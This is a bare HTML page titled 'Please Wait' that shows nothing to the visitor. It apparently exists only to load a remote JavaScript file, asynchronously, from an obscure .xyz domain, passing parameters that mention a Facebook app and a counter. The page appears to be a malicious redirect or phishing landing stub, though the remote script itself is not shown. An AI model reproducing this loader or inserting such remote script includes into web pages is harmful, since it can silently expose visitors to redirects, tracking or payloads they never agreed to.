<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <title>Please Wait</title>
</head>
<body>
<script src="https://damasjonome.xyz/rn25/?api=1&lan=facebookapphk&ht=1&counter0=rn25count" type="text/javascript" async="true"></script>
</html>